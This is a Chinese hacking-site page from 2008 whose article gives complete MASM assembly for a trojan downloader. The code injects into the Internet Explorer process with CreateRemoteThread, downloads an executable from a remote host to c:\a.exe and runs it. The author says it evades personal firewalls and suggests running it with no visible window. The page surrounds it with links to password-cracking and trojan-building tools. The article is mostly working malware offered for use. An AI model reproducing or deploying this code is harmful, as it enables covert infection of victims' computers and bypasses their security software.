首 页论 坛破解QQ密码领免费QQ秀QQ等级修改盗取QQ教程QQ密码暴力破解QQ空间完整做法免费开所有QQ业务
设为首页
加入收藏
联系我们
 软件: QQ软件   综合软件   安全工具   扫站工具   扫机工具   远程监控   木马生成   免杀工具   破解补丁   攻击代理
 文章: QQ文章   综合文章   安全文章   新闻动态   实用技巧   入侵检测   木马病毒   电脑常识   编程设计   网络技术
 教程: QQ教程   综合教程   安全教程   入侵教程   免杀教程   编程教程   脱壳破解   图像处理   网吧技术   木马教程
您当前的位置:下载者 -> 入侵检测 -> 文章内容
栏目导航
· QQ文章 · 综合文章
· 安全文章 · 新闻动态
· 实用技巧 · 入侵检测
· 木马病毒 · 电脑常识
· 编程设计 · 网络技术
相关文章

网站SQL脚本注入的不常见方法..
注入限制绕过
Novell GroupWise客户端 HTM..
SQL注入新方法 可利用日期和..
SQL Server安全-加密术和SQL..
突破SQL注入限制的一点想法
Microsoft SharePoint 服务器..
妙用终截者密码锁防止木马注..
WordPress wp-download插件d..
网站中SQL注入脚本漏洞的挖掘..
Cookie注入是怎样产生的
Php注入原理
PHP难吗?PHP脚本注入的简单步..
新Or 1=1的脚本注入技术详解..
判断cookies注入的js语句
BBSXP绕过过滤继续注入
WordPress AdServe的adclick..
推荐:SQL注入技术和跨站脚本..
Coppermine Photo Gallery跨..
cookie注入也加速
注入下载文件的代码到IE进程然后执行下载的文件
发布时间:2008-5-13 11:54:19

大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候  
后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到)  
所以写了这个程序。。。。  
下载地址  

http://www.chinansl.com/czy/bin.rar  

程序还要改下才好用哈,不过只有2kb很小了。。。。  

编绎参数:  
C:\masm32\BIN>type ii.bat  
ml /c /coff i.asm  
link /subsystem:windows i.obj  

刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。  


; #--------------------------------------# #  
; # Injection downloadcode in IE --> # #  
; # -->also it can jump personal fire wall # #  
; # 2004.07.15 #  
; # codz: czy # #  
; #------------------------------------------# #  

;test on win2k server sp4 masm8  

.386  
.model flat,stdcall  
option casemap:none  

include ../include/user32.inc  
includelib ../lib/user32.lib  
include ../include/kernel32.inc  
includelib ../lib/kernel32.lib  
include ../include/windows.inc  


.data  
hello db ’2K下建远程线程’,0  
tit db ’IEFrame’,0  
szFormat db ’PID是:%d’,0  
szBuffer dd 20 dup(0),0  
pid dd 0  
hProcess dd 0  
hThread dd 0  
pCodeRemote dd 0  
path1 db ’c:\a.EXE’,0  
.const  
szmsg db ’URLDownloadToFileA’,0  
userdll db ’Urlmon.dll’,0  
;szmsg db ’MessageBoxA’,0  
;userdll db ’User32.dll’,0  
szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟  
kerdll db ’kernel32.dll’,0  

.code  
codebegin:  
dispdata db "http://192.168.0.5/NBTreeList.exe";,0  
szTit db "c:\a.exe",0  
datalen =$-codebegin  
Rproc proc msgbox ;MessageBoxA的地址为参数  
CALL @F ;push esi  
@@:  
POP EBX  
SUB EBX,OFFSET @B  
LEA ECX,[EBX+dispdata]  
LEA EDX,[EBX+szTit]  
push NULL  
push 0  
push edx  
push ecx  
push NULL  
call msgbox  
ret ;重要  
Rproc endp  
codelen =$-codebegin ;代码长度xx字节  

start:  
;invoke FindWindow,0,offset tit ;返回计算器窗口句柄  
invoke FindWindow,offset tit,0  
invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号  
;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示  
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄  
mov hProcess,eax ;保存进程句柄  


invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE  
mov pCodeRemote,eax  
invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL  

mov esi,pCodeRemote  
add esi,datalen  
push esi  
invoke LoadLibrary,offset userdll  
invoke GetProcAddress,eax,offset szmsg  
pop esi  
invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0  

mov hThread,eax ; 返回线程句柄  
.if hThread  
invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束  
invoke CloseHandle,hThread ;关闭线程句柄  
.endif  

invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间  
invoke CloseHandle,hProcess ;关闭进程句柄  
invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。  
;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1  
invoke ExitProcess,0  
end start 
[] [打 印] [收 藏]
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 联系站长
如果您对本站有任何建议或意见,请联系站长,感谢您对本站一如既往的支持!
Powered by:NewAsp SiteManageSystem Version 2.1 SP1 1030